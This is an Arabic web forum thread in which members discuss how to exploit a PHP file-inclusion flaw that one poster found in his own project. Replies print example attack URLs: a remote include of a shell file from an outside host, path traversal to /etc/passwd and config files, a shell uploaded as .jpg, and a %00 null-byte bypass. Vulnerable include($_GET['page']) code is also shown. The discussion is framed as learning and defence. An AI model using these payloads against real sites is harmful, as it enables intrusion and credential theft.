النتائج 1 إلى 7 من 7

الموضوع: للمُهتمّين بإختبارات إختراق تطبيقات الويب .. RFL

  1. #1
    عضو نشيط
    تاريخ التسجيل
    Apr 2011
    المشاركات
    97

    للمُهتمّين بإختبارات إختراق تطبيقات الويب .. RFL



    السلام عليكُم ..
    رمضان كريم عليكم جميعاً ..

    أمآآ بعد ..

    بينما أقوم بإختبار إختراق أحد مشاريعي البرمجية على الويب والتي من المُفترض تسليمها الاسبوع القادم, وجَدت ثغرة RemoteFileInclude خطيرة بموقعي, قُمت بإغلاقِها وسأسلّم المشروع قريباً ان شاء الله .

    لكن الذي جَعلني أقم بكتابة الموضوع هو النقاش على كيفية استغلالها و قُدرة الهاكر المحُترف على إستغلال الثغرة, والذي كان تَعقيداً لي أن أرفَع الـShell عبرها .

    الآن أنا أعتبر ذلك تحدّياً حسب خِبرتي البرمجية (الضعيفة قليلاً :court: ) و أفتتح النقاش حَول الإستغلال الأمثل لتلك الثغرة (والذي سيكون للمعرفة لا للتخريب, ولمصلحة المبرمجين و الهاكرز الأخلاقيين) .

    الثغرَة يَ قمآآآآعه :

    في إحدى مجلدات جَلب الصور كان إستغلالُها كالتالي :
    كود:
    site.com/admin/show.php?file=(RFL) !
    
    سيعرض الملف الذي موجود في some_folder/pics/(file)
    الآن المطلوب رفع Shell مثلاً أو إستغلالها بطلب ملفات معينة أو الإستفادة منها للمُخترق .
    آتتحفووني بقدرآتكم ..







  2. #2
    عضو نشيط
    تاريخ التسجيل
    Apr 2011
    المشاركات
    97


    المعذرة ..
    الإختصار يجب أن يَكون RFI ..
    آخطأت بين كابيتال الـI وكابيتآل الـL .






  3. #3
    عضو نشيط
    تاريخ التسجيل
    Jun 2008
    المشاركات
    180


    يفضل رؤية الكود للحكم اكثر هل هي ريموت فايل انكلود ام لوكل فايل انكلود ام محميه

    اذا كانت ريموت فاستغلالها برفع شل على صيغة txt ووضع الرابط ليصبح

    site.com/admin/show.php?file=http://www.example.com/upload/shell.txt

    اما لوكل فيكون الاستغلال هكذا

    site.com/admin/show.php?file=../include/config.php
    على افتراض وجود مجلد include بداخله الكونفق




    هذا مالدي من خبرتي المتواضعه





    التعديل الأخير تم بواسطة doctor9 ; 28-07-2012 الساعة 05:46 PM

  4. #4
    عضو سوبر نشيط
    تاريخ التسجيل
    Jul 2002
    المشاركات
    977


    مثلا في حال أن لدينا ملف هو index.php محتواه
    كود PHP:
    <?php
    include($_GET['page']);
    ?>
    واستخدام الملف على النحو الطبيعي الذي يريده المبرمج لعرض صفحة أتصل بنا مثلا هكذا
    index.php?page=contact.php
    يعني يجلب ملف داخلي

    والإستغلال الضار لهذه الثغرة بطريقتين

    LFI
    index.php?page=../../../../../etc/passwd
    ستخرج جميع اليوزرات على السيرفر وبإمكان المخترق من خلال برنامج معين تخمين
    كلمة 123456 أو 123456789 ونحوها على جميع اليوزرات التي ظهرت له
    وقد يتمكن من الحصول في الأخير على شوية لوحات سيبنل

    يوجد استغلالات أوسع لهذه الثغرة ولكن الكلام حولها يطووول !


    RFI
    index.php?page=http://www.example.com/upload/shell.txt

    نعم في الماضي كان ممكن أن الدالة include تجلب ملف بعيد وتشغله
    أما الآن تم تعطيل جلب الملفات البعيده بشكل افتراضي في إعدادات php.ini وذلك منذ الإصدار 4.3.0 والدليل

    ملاحظة ( دالة include هي دالة سحب وتنفيذ وليست سحب وقرائه ) يعني لن تستفيد لو سحبت config.php ستخرج صفحة بيضاء






  5. #5
    عضو سوبر نشيط
    تاريخ التسجيل
    Jul 2002
    المشاركات
    977


    إضافة أخرى لطريقة استغلال اللوكال فايل سأذكرها بتأنيب ضمير !
    لو كان في الموقع المصاب بهذه الثغرة مركز رفع أرفع شل بإمتداد .jpg وأستعرضه هكذا
    index.php?page=uploads/shell.jpg
    النتيجة سيعمل الشل وهذه إجابة على التساؤل في موضوعك

    إذا كنت هاوي اختراق نصيحتي أن تعتزل أنا أحد من خاض في هذا المجال
    ولي صولات وجولات فيه وما أحلى الإنترنت بعد اعتزال الإختراق





    التعديل الأخير تم بواسطة alotaiby ; 29-07-2012 الساعة 04:10 AM

  6. #6
    عضو نشيط
    تاريخ التسجيل
    Apr 2011
    المشاركات
    97


    أفكار جيّدة ,,
    أخي العتيبي مايحدث بالموضوع مجرد تجارب فَقط, لكن السؤال الآن يا أصدقاء:
    index.php?page=../../../../../etc/passwd

    هل يؤثر هذا الاستغلال إذا كان السكربت يُضيف إفتراضياً اللاحقة .html أو .jpg عند الاستدعاء ؟
    يعني يُصبح الرابط :
    index.php?page=../../../../../etc/passwd.jpg
    وهل هناك طُرق يستطيع بها المخترق حذف اللاحقة .jpg ؟ فهنا مَربط الفرس (:






  7. #7
    عضو سوبر نشيط
    تاريخ التسجيل
    Jul 2002
    المشاركات
    977


    وهل هناك طُرق يستطيع بها المخترق حذف اللاحقة .jpg ؟ فهنا مَربط الفرس (:
    بعض السكربتات تظيف تلقائيا اللاحقة .php كإجراء أمني
    حتى ماتقدر تقرأ passwd

    مثال
    كود PHP:
    <?php
    include($_GET['page'].'.php');
    ?>
    استخدامه على النحو الذي يريده المبرمج لعرض صفحة اتصل بنا مثلا
    index.php?page=contact

    طبعا لو جلبت etc/passwd سيقرأها الملف كأنها etc/passwd.php
    ولا يوجد ملف بعذا الإسم وبالتالي لاتستطيع قراءته

    ظهرت طريقة تخطي بإضافة %00 نهاية الرابط

    index.php?page=../../../../../etc/passwd%00

    الرمز هذا كان يسبب لخبطه للداله ويسحب الملف زي ماهو وهذه طريقة التخطي لإجراء الحمايه هذا
    وأظن تم ترقيعها في اصدارات php الحديثه





    التعديل الأخير تم بواسطة alotaiby ; 29-07-2012 الساعة 03:12 PM





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض